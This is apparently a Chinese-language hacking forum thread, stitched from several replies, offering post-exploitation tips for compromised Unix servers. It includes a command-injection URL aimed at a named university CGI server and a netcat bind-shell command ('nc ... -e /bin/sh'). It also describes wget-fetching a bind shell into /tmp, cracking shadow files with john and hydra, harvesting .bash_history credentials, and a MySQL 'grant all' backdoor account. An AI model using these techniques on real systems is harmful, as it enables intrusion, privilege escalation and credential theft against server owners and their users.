大部分技巧來(lái)源于我家學(xué)究天人的eong大大
用wget把bindshell下載到/tmp/目錄下
或者再/etc/inetd.conf可寫(xiě)的情況下直接開(kāi)一個(gè)交互的shell
然后用gcc編譯
_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|ls -al" rel=nofollow>http://cgiserver.sogang.ac.kr/~gsvi...ilename=rb9.txt|ls -al|
ls -al顯示文件

||中間的是顯示的命令
很簡(jiǎn)單的辦法是得到用戶

1。我是說(shuō)用hydra猜測(cè)密碼，思路混亂的時(shí)候打成john跑shadow了。你可能有疑問(wèn)，有了shell，為什么還要跑普通用戶的密碼（root經(jīng)常是不能登陸的）。主要是為了查看.bash_history和其他資料，以及獲取一個(gè)能夠通過(guò)ssh/ftp/telnet 登陸的賬號(hào)。也要考慮到proftpd_0day 之類(lèi)的是需要一個(gè)能夠正常登陸的賬號(hào)的。沒(méi)有這個(gè)webshell我也不會(huì)跑了，因?yàn)槲疫B用戶名(/etc/passwd)都不知道。.bash_history很可能已經(jīng)包括了你所需要的user/pass.例如mysql的，還包括了管理員通常會(huì)訪問(wèn)的其他服務(wù)器。當(dāng)然不是所有機(jī)器的訪問(wèn)限制都那么嚴(yán)格。/home對(duì)nobody來(lái)說(shuō)也是經(jīng)常可讀的?？墒俏覀儽仨毧紤]所有情況。
2。如果你所知道的所有的vul都被補(bǔ)上了，面對(duì)所有的suid你都無(wú)能為力的時(shí)候。也許通過(guò)一個(gè)可以su -的賬號(hào)你可以騙出root權(quán)限。
3。對(duì)于我個(gè)人來(lái)說(shuō)，用john跑shadow是為了完善我自己的密碼/密碼規(guī)則庫(kù)。
4。我從來(lái)沒(méi)有把netcat和pipe 結(jié)合一起使用過(guò)，沒(méi)有經(jīng)驗(yàn)。也請(qǐng)你指教一下。
To blackfox:
搜索suid是有必要的，原因嘛。。不單純是為了exploit一個(gè)suid程序，也反映了管理員的安全意識(shí)層次嘛。當(dāng)然也許這年頭還會(huì)有suidshell的存在。

exec`nc -l -n -p 60000 -e /bin/sh`
nc下載地址：http://www.leftworld.net/download/show?id=316.html

mysql的ip禁止連接的打開(kāi)方法：
find / -name my.cnf -print
mysql> grant all on *.* to username@IP identified by 'password';

最新評(píng)論